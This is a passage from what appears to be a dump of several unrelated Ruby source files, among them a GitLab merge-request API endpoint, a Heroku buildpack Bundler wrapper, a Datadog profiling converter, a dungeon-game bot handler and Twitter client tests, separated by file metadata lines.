present merge_request, with: Entities::MergeRequest, current_user: current_user, project: user_project
else
handle_merge_request_errors! merge_request.errors
end
end
desc 'Merge a merge request' do
success Entities::MergeRequest
end
params do
optional :merge_commit_message, type: String, desc: 'Custom merge commit message'
optional :should_remove_source_branch, type: Boolean,
desc: 'When true, the source branch will be deleted if possible'
optional :merge_when_build_succeeds, type: Boolean,
desc: 'When true, this merge request will be merged when the pipeline succeeds'
optional :sha, type: String, desc: 'When present, must have the HEAD SHA of the source branch'
end
put "#{path}/merge" do
merge_request = user_project.merge_requests.find(params[:merge_request_id])
          # The merge request cannot be merged
          # because the user doesn't have permission to push to the target branch
unauthorized! unless merge_request.can_be_merged_by?(current_user)
not_allowed! unless merge_request.mergeable_state?
render_api_error!('Branch cannot be merged', 406) unless merge_request.mergeable?
if params[:sha] && merge_request.diff_head_sha != params[:sha]
render_api_error!("SHA does not match HEAD of source branch: #{merge_request.diff_head_sha}", 409)
end
merge_params = {
commit_message: params[:merge_commit_message],
should_remove_source_branch: params[:should_remove_source_branch]
}
if params[:merge_when_build_succeeds] && merge_request.head_pipeline && merge_request.head_pipeline.active?
::MergeRequests::MergeWhenPipelineSucceedsService
.new(merge_request.target_project, current_user, merge_params)
.execute(merge_request)
else
::MergeRequests::MergeService
.new(merge_request.target_project, current_user, merge_params)
.execute(merge_request)
end
present merge_request, with: Entities::MergeRequest, current_user: current_user, project: user_project
end
desc 'Cancel merge if "Merge When Pipeline Succeeds" is enabled' do
success Entities::MergeRequest
end
post "#{path}/cancel_merge_when_build_succeeds" do
merge_request = user_project.merge_requests.find(params[:merge_request_id])
unauthorized! unless merge_request.can_cancel_merge_when_build_succeeds?(current_user)
          ::MergeRequests::MergeWhenPipelineSucceedsService
.new(merge_request.target_project, current_user)
.cancel(merge_request)
end
desc 'Get the comments of a merge request' do
detail 'Duplicate. DEPRECATED and WILL BE REMOVED in 9.0'
success Entities::MRNote
end
params do
use :pagination
end
get "#{path}/comments" do
merge_request = user_project.merge_requests.find(params[:merge_request_id])
authorize! :read_merge_request, merge_request
present paginate(merge_request.notes.fresh), with: Entities::MRNote
end
desc 'Post a comment to a merge request' do
detail 'Duplicate. DEPRECATED and WILL BE REMOVED in 9.0'
success Entities::MRNote
end
params do
requires :note, type: String, desc: 'The text of the comment'
end
post "#{path}/comments" do
merge_request = user_project.merge_requests.find(params[:merge_request_id])
authorize! :create_note, merge_request
opts = {
note: params[:note],
noteable_type: 'MergeRequest',
noteable_id: merge_request.id
}
note = ::Notes::CreateService.new(user_project, current_user, opts).execute
if note.save
present note, with: Entities::MRNote
else
render_api_error!("Failed to save note #{note.errors.messages}", 400)
end
end
desc 'List issues that will be closed on merge' do
success Entities::MRNote
end
params do
use :pagination
end
get "#{path}/closes_issues" do
merge_request = user_project.merge_requests.find(params[:merge_request_id])
issues = ::Kaminari.paginate_array(merge_request.closes_issues(current_user))
present paginate(issues), with: issue_entity(user_project), current_user: current_user
end
end
end
end
end
| 42.521127 | 135 | 0.648973 |
792dd5fe0ba3f18284057c500c26c1267135b7b8 | 430 | # frozen_string_literal: true
module CacheWithSettings::Helpers
module RenderingHelper
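    # Wraps Rails' #render: when the options hash contains `cached: true`, the
    # flag is replaced with a lambda that builds the cache key via
    # CacheWithSettings.compose_key before delegating to the original render.
    # Illustrative call (any render options hash is treated the same way):
    #   render partial: "post", collection: @posts, cached: true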
def render(options = {}, locals = {}, &block)
if options.kind_of?(Hash) && options[:cached] == true
options[:cached] = -> object { CacheWithSettings.compose_key(object) }
end
if block_given?
super(options, locals) { yield(block) }
else
super(options, locals)
end
end
end
end
| 23.888889 | 78 | 0.630233 |
7a4e46b37b3526def0906d2af4ce7a578cacfa96 | 6,656 | # frozen_string_literal: true
require 'language_pack/fetcher'
# This class is responsible for installing and maintaining a
# reference to bundler. It contains access to bundler internals
# that are used to introspect a project such as detecting presence
# of gems and their versions.
#
# Example:
#
# bundler = LanguagePack::Helpers::BundlerWrapper.new
# bundler.install
# bundler.version => "1.15.2"
# bundler.dir_name => "bundler-1.15.2"
# bundler.has_gem?("railties") => true
# bundler.gem_version("railties") => "5.2.2"
# bundler.clean
#
# Also used to determine the version of Ruby that a project is using
# based on `bundle platform --ruby`
#
# bundler.ruby_version # => "ruby-2.5.1"
# bundler.clean
#
# IMPORTANT: Calling `BundlerWrapper#install` on this class mutates the environment variable
#     ENV['BUNDLE_GEMFILE']. If you're calling in a test context (or anything outside
#     of an isolated dyno), you must call `BundlerWrapper#clean`. To reset the environment
# variable:
#
# bundler = LanguagePack::Helpers::BundlerWrapper.new
# bundler.install
# bundler.clean # <========== IMPORTANT =============
#
class LanguagePack::Helpers::BundlerWrapper
include LanguagePack::ShellHelpers
BLESSED_BUNDLER_VERSIONS = {}
BLESSED_BUNDLER_VERSIONS["1"] = "1.17.3"
BLESSED_BUNDLER_VERSIONS["2"] = "2.0.2"
BUNDLED_WITH_REGEX = /^BUNDLED WITH$(\r?\n) (?<major>\d+)\.\d+\.\d+/m
class GemfileParseError < BuildpackError
def initialize(error)
msg = String.new("There was an error parsing your Gemfile, we cannot continue\n")
msg << error
super msg
end
end
class UnsupportedBundlerVersion < BuildpackError
def initialize(version_hash, major)
msg = String.new("Your Gemfile.lock indicates you need bundler `#{major}.x`\n")
msg << "which is not currently supported. You can deploy with bundler version:\n"
version_hash.keys.each do |v|
msg << " - `#{v}.x`\n"
end
msg << "\nTo use another version of bundler, update your `Gemfile.lock` to point\n"
msg << "to a supported version. For example:\n"
msg << "\n"
msg << "```\n"
msg << "BUNDLED WITH\n"
msg << " #{version_hash["1"]}\n"
msg << "```\n"
super msg
end
end
attr_reader :bundler_path
def initialize(options = {})
@bundler_tmp = Pathname.new(Dir.mktmpdir)
@fetcher = options[:fetcher] || LanguagePack::Fetcher.new(LanguagePack::Base::VENDOR_URL) # coupling
@gemfile_path = options[:gemfile_path] || Pathname.new("./Gemfile")
@gemfile_lock_path = Pathname.new("#{@gemfile_path}.lock")
detect_bundler_version_and_dir_name!
@bundler_path = options[:bundler_path] || @bundler_tmp.join(dir_name)
@bundler_tar = options[:bundler_tar] || "bundler/#{dir_name}.tgz"
@orig_bundle_gemfile = ENV['BUNDLE_GEMFILE']
@path = Pathname.new("#{@bundler_path}/gems/#{dir_name}/lib")
end
def install
ENV['BUNDLE_GEMFILE'] = @gemfile_path.to_s
fetch_bundler
$LOAD_PATH << @path
require "bundler"
self
end
def clean
ENV['BUNDLE_GEMFILE'] = @orig_bundle_gemfile
@bundler_tmp.rmtree if @bundler_tmp.directory?
end
def has_gem?(name)
specs.key?(name)
end
def gem_version(name)
instrument "ruby.gem_version" do
if spec = specs[name]
spec.version
end
end
end
# detects whether the Gemfile.lock contains the Windows platform
# @return [Boolean] true if the Gemfile.lock was created on Windows
def windows_gemfile_lock?
platforms.detect do |platform|
/mingw|mswin/.match(platform.os) if platform.is_a?(Gem::Platform)
end
end
def specs
@specs ||= lockfile_parser.specs.each_with_object({}) {|spec, hash| hash[spec.name] = spec }
end
def platforms
@platforms ||= lockfile_parser.platforms
end
def version
@version
end
def dir_name
"bundler-#{version}"
end
def instrument(*args, &block)
LanguagePack::Instrument.instrument(*args, &block)
end
def ruby_version
instrument 'detect_ruby_version' do
env = { "PATH" => "#{bundler_path}/bin:#{ENV['PATH']}",
"RUBYLIB" => File.join(bundler_path, "gems", dir_name, "lib"),
"GEM_PATH" => "#{bundler_path}:#{ENV["GEM_PATH"]}",
"BUNDLE_DISABLE_VERSION_CHECK" => "true"
}
command = "bundle platform --ruby"
# Silently check for ruby version
output = run_stdout(command, user_env: true, env: env).strip.lines.last
      # If the Gemfile can't be parsed (e.g. a syntax error), surface the error from `bundle check`
raise GemfileParseError.new(run("bundle check", user_env: true, env: env)) unless $?.success?
if output.match(/No ruby version specified/)
""
else
output.chomp.sub('(', '').sub(')', '').sub(/(p-?\d+)/, ' \1').split.join('-')
end
end
end
def lockfile_parser
@lockfile_parser ||= parse_gemfile_lock
end
private
def fetch_bundler
instrument 'fetch_bundler' do
return true if Dir.exists?(bundler_path)
topic("Installing bundler #{@version}")
bundler_version_escape_valve!
FileUtils.mkdir_p(bundler_path)
Dir.chdir(bundler_path) do
@fetcher.fetch_untar(@bundler_tar)
end
Dir["bin/*"].each {|path| `chmod 755 #{path}` }
end
end
def parse_gemfile_lock
instrument 'parse_bundle' do
gemfile_contents = File.read(@gemfile_lock_path)
Bundler::LockfileParser.new(gemfile_contents)
end
end
def major_bundler_version
# https://rubular.com/r/jt9yj0aY7fU3hD
bundler_version_match = @gemfile_lock_path.read(mode: "rt").match(BUNDLED_WITH_REGEX)
if bundler_version_match
bundler_version_match[:major]
else
"1"
end
end
# You cannot use Bundler 2.x with a Gemfile.lock that points to a 1.x bundler
# version. The solution here is to read in the value set in the Gemfile.lock
# and download the "blessed" version with the same major version.
def detect_bundler_version_and_dir_name!
major = major_bundler_version
if BLESSED_BUNDLER_VERSIONS.key?(major)
@version = BLESSED_BUNDLER_VERSIONS[major]
else
raise UnsupportedBundlerVersion.new(BLESSED_BUNDLER_VERSIONS, major)
end
end
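  # Strips the "BUNDLED WITH <version>" block from the Gemfile.lock so the
  # lockfile no longer pins a bundler version different from the one installed here.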
def bundler_version_escape_valve!
topic("Removing BUNDLED WITH version in the Gemfile.lock")
contents = File.read("Gemfile.lock")
File.open("Gemfile.lock", "w") do |f|
f.write contents.sub(/^BUNDLED WITH$(\r?\n) (?<major>\d+)\.\d+\.\d+/m, '')
end
end
end
| 30.53211 | 122 | 0.656851 |
f87788ba9ccb5f0c260747f9bf9de8f98b0ed2f4 | 40 | module Johannes
VERSION = "0.0.1"
end
| 10 | 19 | 0.675 |
abea672c525e7a76af8e53130d1bff76ec21cca2 | 3,326 | require 'pry'
module Handlers
class Dungeon
include PoroPlus
include Behavior::HandlesCommands
def move
if Place.current.has_exit?(movement_direction)
response = "#{message.sender_nick} dazedly leads the party #{movement_direction}.\n\r" if message.sender.dazed?
response = "#{message.sender_nick} staggers #{movement_direction}.\n\r" if message.sender.drunk?
response = "#{message.sender_nick} leads the party (hopefully) #{movement_direction}.\n\r" if message.sender.disoriented?
response ||= ""
response << Place.go(movement_direction)
else
response = "You can't go that way!"
end
message.response = response
end
def look
if subject = command.subject
Alice::Util::Logger.info "*** Look subject is \"#{command.subject}\""
response = look_in_direction(looking_direction) if looking_direction.present?
response = describe_setting(subject) if Place.current.description =~ /#{subject}/i
response ||= subject.describe if subject.is_a? User
response ||= extant_object(subject).try(:describe)
end
if command.predicate == "look" && command_string.fragment == ""
response = Place.current.describe
end
response ||= extant_object(command_string.fragment).try(:describe)
response ||= extant_object(command.predicate).try(:describe)
response ||= "I don't see that here."
message.response = response
end
def map
message.response = "You can find an up-to-date map of the dungeon at #{ENV['MAP_URL']}. Your current location is highlighted in red. Be sure to mouse over the rooms!"
end
def xyzzy
room = Place.all.sample
Place.set_current_room(room)
response = "Everything spins around!\n\r"
response << room.describe
message.response = response
end
def attack
if command.subject =~ /darkness/ && Place.current.is_dark?
message.response = "You attack the darkness! A voice to the east whines, 'Where is the Mountain Dew?'"
elsif command.subject =~ /gazebo/# && Place.current.description =~ /gazebo/
response = "The dread gazebo kills you all!\n\r"
response << reset_maze
message.response = response
else
message.response = Util::Randomizer.attack
end
end
private
def describe_setting(aspect)
return unless aspect.present?
Util::Randomizer.item_description(aspect)
end
def looking_direction
@look_direction ||= ::Dungeon.direction_from(command.predicate)
end
def look_in_direction(direction)
if Place.current.has_exit?(direction)
response = Place.place_to(direction, party_moving=false, create_place=true).view_from_afar
else
response = "A lovely wall you've found there."
end
end
def movement_direction
@movement_direction ||= ::Dungeon.direction_from(command_string.verb)
end
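    # Resolves a name to something present in the game world: a user, item,
    # beverage, or an actor standing in the current place.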
def extant_object(name)
return if name.empty?
if actor = ::Actor.from(name)
actor = Place.current.actors.include?(actor) ? actor : nil
end
(::User.from(name) || ::Item.from(name) || ::Beverage.from(name) || actor)
end
def reset_maze
message.response = ::Dungeon.reset!
end
end
end
| 32.930693 | 172 | 0.659651 |
03363ba5abb924518886ceb7243a96829efbf2fd | 152 | module ActivePresenter
module VERSION
MAJOR = 0
MINOR = 0
TINY = 3
STRING = [MAJOR, MINOR, TINY].join('.')
end
end
| 15.2 | 45 | 0.532895 |
e87e3244c907207ce5ad6a2461046a447b2f54eb | 959 | require "rails_helper"
RSpec.describe EventsController, type: :routing do
describe "routing" do
it "routes to #index" do
expect(get: "/events").to route_to("events#index")
end
it "routes to #new" do
expect(get: "/events/new").to route_to("events#new")
end
it "routes to #show" do
expect(get: "/events/1").to route_to("events#show", id: "1")
end
it "routes to #edit" do
expect(get: "/events/1/edit").to route_to("events#edit", id: "1")
end
it "routes to #create" do
expect(post: "/events").to route_to("events#create")
end
it "routes to #update via PUT" do
expect(put: "/events/1").to route_to("events#update", id: "1")
end
it "routes to #update via PATCH" do
expect(patch: "/events/1").to route_to("events#update", id: "1")
end
it "routes to #destroy" do
expect(delete: "/events/1").to route_to("events#destroy", id: "1")
end
end
end
| 24.589744 | 72 | 0.605839 |
089e94f672af453c5e989907fad7ec98b0e7c431 | 458 | module ItemDecoratorCommon
extend ActiveSupport::Concern
included do
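    # Builds a hash of the model's DIFF_FIELDS values, rendering :url as a
    # truncated link and :tombo_image as a 200x200 image tag.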
def to_values
model.class::DIFF_FIELDS.inject({}) do |hash, field|
hash[field] = case field
when :url
h.link_to(send(:url).truncate(30), send(:url), target: "_blank")
when :tombo_image
h.annict_image_tag(self, :tombo_image, size: "200x200")
else
send(field)
end
hash
end
end
end
end
| 21.809524 | 74 | 0.58952 |
38521d19bb029f434425ec28cda26a92b8ab5768 | 464 | Refinery::Application.routes.draw do
resources :pages
scope(:path => 'refinery', :as => 'admin', :module => 'admin') do
resources :pages do
collection do
post :update_positions
end
end
resources :page_parts
resource :pages do
resources :dialogs, :controller => :pages_dialogs do
collection do
get :link_to
get :test_url
get :test_email
end
end
end
end
end
| 18.56 | 67 | 0.586207 |
f7db83c456515fb924a40ec12cb06d05b169f5bd | 339 | require_relative 'account'
require_relative 'portfolio'
portfolio = Portfolio.new
portfolio.add_account Account.new('red', 2000)
portfolio.add_account Account.new('blue', 1000)
portfolio.add_account Account.new('green', 500)
puts portfolio.any? { |account| account.balance > 2000 }
puts portfolio.all? { |account| account.balance >= 10 } | 33.9 | 56 | 0.772861 |
1d3b4863491d174f040610aa111fc41a3b5bef02 | 802 | require 'sinatra'
require 'rubygems'
require 'aws-record'
require_relative "models/landpage_lead.rb"
require_relative "controllers/landpage_lead_controller.rb"
before do
if (! request.body.read.empty? and request.body.size > 0)
request.body.rewind
@params = Sinatra::IndifferentHash.new
@params.merge!(JSON.parse(request.body.read))
end
end
##################################
# For the index page
##################################
get '/' do
erb :index
end
get '/landpage' do
erb :landpage
end
##################################
# For the API
##################################
get '/api/lead' do
content_type :json
items = LandpageLeadController.list
end
post '/api/lead' do
content_type :json
item = LandpageLeadController.create(params)
item.to_h.to_json
end
| 18.651163 | 59 | 0.607232 |
e93f16da641b5a29ecfe622245d68d1ee2787caa | 3,027 | require 'ddtrace/ext/profiling'
require 'ddtrace/profiling/events/stack'
require 'ddtrace/profiling/pprof/builder'
require 'ddtrace/profiling/pprof/converter'
module Datadog
module Profiling
module Pprof
# Builds a profile from a StackSample
class StackSample < Converter
SAMPLE_TYPES = {
cpu_time_ns: [
Datadog::Ext::Profiling::Pprof::VALUE_TYPE_CPU,
Datadog::Ext::Profiling::Pprof::VALUE_UNIT_NANOSECONDS
],
wall_time_ns: [
Datadog::Ext::Profiling::Pprof::VALUE_TYPE_WALL,
Datadog::Ext::Profiling::Pprof::VALUE_UNIT_NANOSECONDS
]
}.freeze
def self.sample_value_types
SAMPLE_TYPES
end
def add_events!(stack_samples)
new_samples = build_samples(stack_samples)
builder.samples.concat(new_samples)
end
def stack_sample_group_key(stack_sample)
stack_sample.hash
end
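        # Groups events sharing the same StackSample#hash and emits one pprof
        # sample per group, built from the group's aggregated values.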
def build_samples(stack_samples)
groups = group_events(stack_samples, &method(:stack_sample_group_key))
groups.collect do |_group_key, group|
build_sample(group.sample, group.values)
end
end
def build_sample(stack_sample, values)
locations = builder.build_locations(
stack_sample.frames,
stack_sample.total_frame_count
)
Perftools::Profiles::Sample.new(
location_id: locations.collect(&:id),
value: values,
label: build_sample_labels(stack_sample)
)
end
def build_sample_values(stack_sample)
no_value = Datadog::Ext::Profiling::Pprof::SAMPLE_VALUE_NO_VALUE
values = super(stack_sample)
values[sample_value_index(:cpu_time_ns)] = stack_sample.cpu_time_interval_ns || no_value
values[sample_value_index(:wall_time_ns)] = stack_sample.wall_time_interval_ns || no_value
values
end
def build_sample_labels(stack_sample)
labels = [
Perftools::Profiles::Label.new(
key: builder.string_table.fetch(Datadog::Ext::Profiling::Pprof::LABEL_KEY_THREAD_ID),
str: builder.string_table.fetch(stack_sample.thread_id.to_s)
)
]
unless stack_sample.trace_id.nil? || stack_sample.trace_id.zero?
labels << Perftools::Profiles::Label.new(
key: builder.string_table.fetch(Datadog::Ext::Profiling::Pprof::LABEL_KEY_TRACE_ID),
str: builder.string_table.fetch(stack_sample.trace_id.to_s)
)
end
unless stack_sample.span_id.nil? || stack_sample.span_id.zero?
labels << Perftools::Profiles::Label.new(
key: builder.string_table.fetch(Datadog::Ext::Profiling::Pprof::LABEL_KEY_SPAN_ID),
str: builder.string_table.fetch(stack_sample.span_id.to_s)
)
end
labels
end
end
end
end
end
| 33.263736 | 100 | 0.625041 |
38825eaa71b1492442dfb722b204181330d408be | 1,740 | ##########################################################################
# Copyright 2015 ThoughtWorks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
require 'spec_helper'
describe ApiV2::AgentsRepresenter do
include AgentMother
it 'renders all agents with hal representation' do
idle_agent = idle_agent(
hostname: 'Agent01',
location: '/var/lib/go-server',
uuid: 'some-uuid',
space: 10.gigabytes,
operating_system: 'Linux',
ip_address: '127.0.0.1',
resources: 'linux,firefox',
environments: ['uat', 'load_test']
)
presenter = ApiV2::AgentsRepresenter.new([idle_agent])
actual_json = presenter.to_hash(url_builder: UrlBuilder.new)
expect(actual_json).to have_links(:self, :doc)
expect(actual_json).to have_link(:self).with_url('http://test.host/api/agents')
expect(actual_json).to have_link(:doc).with_url('http://api.go.cd/#agents')
actual_json.delete(:_links)
actual_json.fetch(:_embedded).should == { :agents => [ApiV2::AgentRepresenter.new(idle_agent).to_hash(url_builder: UrlBuilder.new)] }
end
end
| 39.545455 | 137 | 0.631609 |
1a067e23c2ac32437668a7361d1ed4c48c33813f | 1,262 | cask 'mps' do
version '2017.3,173.1427'
sha256 'f2db828314488712f27143c0688680b7b1829f72bc6d40a3a3eb9606b6e49aa2'
url "https://download.jetbrains.com/mps/#{version.before_comma.major_minor}/MPS-#{version.before_comma}-macos-jdk-bundled.dmg"
appcast 'https://data.services.jetbrains.com/products/releases?code=MPS&latest=true&type=release',
checkpoint: '9a6768c634431dfab713bd8ae2adfb21b4563a6813eedf1ebca3c4022c1ab661'
name 'JetBrains MPS'
homepage 'https://www.jetbrains.com/mps/'
auto_updates true
app "MPS #{version.major_minor}.app"
uninstall_postflight do
ENV['PATH'].split(File::PATH_SEPARATOR).map { |path| File.join(path, 'mps') }.each { |path| File.delete(path) if File.exist?(path) && File.readlines(path).grep(%r{# see com.intellij.idea.SocketLock for the server side of this interface}).any? }
end
zap trash: [
"~/MPSSamples.#{version.before_comma.major_minor}",
"~/Library/Application Support/MPS#{version.before_comma.major_minor}",
"~/Library/Caches/MPS#{version.before_comma.major_minor}",
"~/Library/Logs/MPS#{version.before_comma.major_minor}",
"~/Library/Preferences/MPS#{version.before_comma.major_minor}",
]
end
| 46.740741 | 248 | 0.706022 |
91fb10b5836b5dcb57d91f718a308db7885d381e | 529 | shared_context "configurator with stub builder and requester" do
let(:configurator) { HttpStub::Examples::ConfiguratorWithComprehensiveStubs }
let(:stub_builder) { configurator.stub_builder }
let(:stub_requester) { HttpStub::StubRequester.new(server_uri, stub_builder) }
let(:stub_match_rules) { stub_builder.match_rules }
let(:stub_response) { stub_builder.response }
let(:expected_match_response) { stub_requester.expected_response }
let(:stub_request) { stub_requester.last_request }
end
| 35.266667 | 80 | 0.758034 |
2857f95b015b0bd8a53cbe001372c570e1d6fa58 | 2,458 | =begin
#Hydrogen Atom API
#The Hydrogen Atom API
OpenAPI spec version: 1.7.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.14
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for NucleusApi::PageAllocation
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'PageAllocation' do
before do
# run before each test
@instance = NucleusApi::PageAllocation.new
end
after do
# run after each test
end
describe 'test an instance of PageAllocation' do
it 'should create an instance of PageAllocation' do
expect(@instance).to be_instance_of(NucleusApi::PageAllocation)
end
end
describe 'test attribute "content"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "first"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "last"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "number"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "number_of_elements"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "size"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "sort"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "total_elements"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "total_pages"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 27.311111 | 102 | 0.715216 |
79663ce3a940979f69935faf7e2c004a797a10e8 | 2,819 | # frozen_string_literal: true
module RuboCop
module Cop
module Gemspec
# Dependencies in the gemspec should be alphabetically sorted.
#
# @example
# # bad
# spec.add_dependency 'rubocop'
# spec.add_dependency 'rspec'
#
# # good
# spec.add_dependency 'rspec'
# spec.add_dependency 'rubocop'
#
# # good
# spec.add_dependency 'rubocop'
#
# spec.add_dependency 'rspec'
#
# # bad
# spec.add_development_dependency 'rubocop'
# spec.add_development_dependency 'rspec'
#
# # good
# spec.add_development_dependency 'rspec'
# spec.add_development_dependency 'rubocop'
#
# # good
# spec.add_development_dependency 'rubocop'
#
# spec.add_development_dependency 'rspec'
#
# # bad
# spec.add_runtime_dependency 'rubocop'
# spec.add_runtime_dependency 'rspec'
#
# # good
# spec.add_runtime_dependency 'rspec'
# spec.add_runtime_dependency 'rubocop'
#
# # good
# spec.add_runtime_dependency 'rubocop'
#
# spec.add_runtime_dependency 'rspec'
#
# # good only if TreatCommentsAsGroupSeparators is true
# # For code quality
# spec.add_dependency 'rubocop'
# # For tests
# spec.add_dependency 'rspec'
class OrderedDependencies < Base
extend AutoCorrector
include OrderedGemNode
MSG = 'Dependencies should be sorted in an alphabetical order within ' \
'their section of the gemspec. ' \
'Dependency `%<previous>s` should appear before `%<current>s`.'
def on_new_investigation
return if processed_source.blank?
dependency_declarations(processed_source.ast)
.each_cons(2) do |previous, current|
next unless consecutive_lines(previous, current)
next unless case_insensitive_out_of_order?(gem_name(current), gem_name(previous))
next unless get_dependency_name(previous) == get_dependency_name(current)
register_offense(previous, current)
end
end
private
def previous_declaration(node)
declarations = dependency_declarations(processed_source.ast)
node_index = declarations.find_index(node)
declarations.to_a[node_index - 1]
end
def get_dependency_name(node)
node.method_name
end
# @!method dependency_declarations(node)
def_node_search :dependency_declarations, <<~PATTERN
(send (lvar _) {:add_dependency :add_runtime_dependency :add_development_dependency} (str _) ...)
PATTERN
end
end
end
end
| 29.989362 | 107 | 0.608726 |
915a7ed103a3d32a59a78ce5ea00c4e5eb00993d | 99 | module ParamsValidation
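  # Anchored email format check, e.g. it matches "[email protected]".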
EmailRegex = /\A[a-zA-Z0-9_.+\-]+@[a-zA-Z0-9\-]+\.[a-zA-Z0-9\-.]+\z/
end
| 24.75 | 70 | 0.565657 |
1a166dfa82e2fd1c929f4ae1875c8392e841e1bf | 364 | class CreateUserAddresses < ActiveRecord::Migration[6.1]
def change
create_table :user_addresses do |t|
t.references :user, type: :bigint
t.string :fullname
t.string :address_line1
t.string :address_line2
t.string :city
t.string :state
t.string :zip_code
t.string :country
t.timestamps
end
end
end
| 22.75 | 56 | 0.651099 |
180520b27e7facb1d9d91bd27bf316a9ff67aadb | 564 | # frozen_string_literal: true
require 'spec_helper'
describe Gitlab::Cluster::PumaWorkerKillerObserver do
let(:counter) { Gitlab::Metrics::NullMetric.instance }
before do
allow(Gitlab::Metrics).to receive(:counter)
.with(any_args)
.and_return(counter)
end
describe '#callback' do
subject { described_class.new }
it 'increments timeout counter' do
worker = double(index: 0)
expect(counter)
.to receive(:increment)
.with({ worker: 'worker_0' })
subject.callback.call(worker)
end
end
end
| 20.142857 | 56 | 0.66844 |
f86f5212f149b7ec04e99ef8e680e44e0d606731 | 597 | class Documentaries
attr_accessor :rating, :year_made, :title, :movie_url
@@all = []
def initialize(rating, year_made, title, movie_url)
@rating = rating
@year_made = year_made
@title = title
@movie_url = movie_url
@@all << self
end
def self.reset!
@@all = []
end
def self.all
@@all
end
def self.movies_made_after(year)
#return all docs made after year_made
list = self.all.find_all {|m| m.year_made.to_i > year}
list.each.with_index(1) {|m, i| puts "#{i}. #{m.title} -- #{m.year_made} \n\t #{m.movie_url}" }
end
end
| 21.321429 | 99 | 0.609715 |
5d2765532ffeaa099ccc4f0e8007ae91076cabac | 5,761 | require 'helper'
describe Twitter::REST::Undocumented do
before do
@client = Twitter::REST::Client.new(consumer_key: 'CK', consumer_secret: 'CS', access_token: 'AT', access_token_secret: 'AS')
end
describe '#following_followers_of' do
context 'with a screen_name passed' do
before do
stub_get('/users/following_followers_of.json').with(query: {screen_name: 'sferik', cursor: '-1'}).to_return(body: fixture('users_list.json'), headers: {content_type: 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.following_followers_of('sferik')
expect(a_get('/users/following_followers_of.json').with(query: {screen_name: 'sferik', cursor: '-1'})).to have_been_made
end
it 'returns an array of numeric IDs for every user following the specified user' do
following_followers_of = @client.following_followers_of('sferik')
expect(following_followers_of).to be_a Twitter::Cursor
expect(following_followers_of.first).to be_a Twitter::User
end
context 'with each' do
before do
stub_get('/users/following_followers_of.json').with(query: {screen_name: 'sferik', cursor: '1322801608223717003'}).to_return(body: fixture('users_list2.json'), headers: {content_type: 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.following_followers_of('sferik').each {}
expect(a_get('/users/following_followers_of.json').with(query: {screen_name: 'sferik', cursor: '-1'})).to have_been_made
expect(a_get('/users/following_followers_of.json').with(query: {screen_name: 'sferik', cursor: '1322801608223717003'})).to have_been_made
end
end
end
context 'with a user ID passed' do
before do
stub_get('/users/following_followers_of.json').with(query: {user_id: '7505382', cursor: '-1'}).to_return(body: fixture('users_list.json'), headers: {content_type: 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.following_followers_of(7_505_382)
expect(a_get('/users/following_followers_of.json').with(query: {user_id: '7505382', cursor: '-1'})).to have_been_made
end
context 'with each' do
before do
stub_get('/users/following_followers_of.json').with(query: {user_id: '7505382', cursor: '1322801608223717003'}).to_return(body: fixture('users_list2.json'), headers: {content_type: 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.following_followers_of(7_505_382).each {}
expect(a_get('/users/following_followers_of.json').with(query: {user_id: '7505382', cursor: '-1'})).to have_been_made
expect(a_get('/users/following_followers_of.json').with(query: {user_id: '7505382', cursor: '1322801608223717003'})).to have_been_made
end
end
end
context 'without arguments passed' do
before do
stub_get('/1.1/account/verify_credentials.json').with(query: {skip_status: 'true'}).to_return(body: fixture('sferik.json'), headers: {content_type: 'application/json; charset=utf-8'})
stub_get('/users/following_followers_of.json').with(query: {user_id: '7505382', cursor: '-1'}).to_return(body: fixture('users_list.json'), headers: {content_type: 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.following_followers_of
expect(a_get('/1.1/account/verify_credentials.json').with(query: {skip_status: 'true'})).to have_been_made
expect(a_get('/users/following_followers_of.json').with(query: {user_id: '7505382', cursor: '-1'})).to have_been_made
end
it 'returns an array of numeric IDs for every user following the specified user' do
following_followers_of = @client.following_followers_of
expect(following_followers_of).to be_a Twitter::Cursor
expect(following_followers_of.first).to be_a Twitter::User
end
context 'with each' do
before do
stub_get('/users/following_followers_of.json').with(query: {user_id: '7505382', cursor: '1322801608223717003'}).to_return(body: fixture('users_list2.json'), headers: {content_type: 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.following_followers_of.each {}
expect(a_get('/users/following_followers_of.json').with(query: {user_id: '7505382', cursor: '-1'})).to have_been_made
expect(a_get('/users/following_followers_of.json').with(query: {user_id: '7505382', cursor: '1322801608223717003'})).to have_been_made
end
end
end
end
describe '#tweet_count' do
before do
